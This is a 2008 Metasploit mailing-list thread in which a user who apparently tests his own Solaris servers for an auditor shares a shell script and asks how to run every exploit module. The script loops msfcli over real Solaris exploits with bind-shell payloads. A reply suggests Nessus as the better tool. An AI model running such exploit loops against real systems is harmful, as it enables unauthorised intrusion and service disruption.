Metasploit mailing list archives
try to exploit everything
From: mail2arthur at gmail.com (arthur)
Date: Fri, 25 Jul 2008 14:15:38 -0400
Thanks. Actually MSF is the 3rd section in my report. The first section is using nmap to discover the ips/ports, the 2nd section is Nessus blind scan with all plugin enabled (also unchecked the safeCheck and turn on the throughTests), but the auditor still likes to see more with MSF :( Just try to find a easy way to make the guy happy instead of talking too much. You know what, even our server is not running web app, he still ask a test of XSS... Arthur
Arthur, For this kind of testing, Metasploit is the wrong tool for the job. If you just want to huck a bunch of exploits at the target without regard for whether they might actually work, try something like Nessus instead. Hope this helped, egypt 2008/7/25 arthur <mail2arthur at gmail.com>:Hi All, We are pentesting our Solaris 10 servers and so far I built a script to
call
msfcli to try all the Solaris modules (even Solaris 8/9, partial script below). However the auditor likes to see we try ALL to make sure the server/app won't down after a silly hacker try a wrong attack. With RHOST set globally, is there any easy way to run all. Thanks, Arthur ... APP=./msfcli ADD="..." PL1=cmd/unix/bind_perl PL2=generic/shell_bind_tcp test_run() { cmd=$@ echo $cmd echo $cmd>>$FN sudo $cmd>>$FN 2>&1 } for addr in $ADD ; do test_run $APP solaris/dtspcd/heap_noir RHOST=$addr C test_run $APP solaris/lpd/sendmail_exec RHOST=$addr PAYLOAD=$PL1 E test_run $APP solaris/samba/lsa_transnames_heap RHOST=$addr
PAYLOAD=$PL2 E
test_run $APP solaris/samba/trans2open RHOST=$addr PAYLOAD=$PL2
TARGET=0 E
test_run $APP solaris/sunrpc/sadmind_exec RHOST=$addr PAYLOAD=$PL1 E test_run $APP solaris/sunrpc/ypupdated_exec RHOST=$addr PAYLOAD=$PL1 E test_run $APP solaris/telnet/fuser RHOST=$addr PAYLOAD=$PL1 E test_run $APP solaris/telnet/ttyprompt RHOST=$addr PAYLOAD=$PL1 E done ... _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
Current thread:
- try to exploit everything arthur (Jul 25)
- Message not available
- try to exploit everything arthur (Jul 25)
- Message not available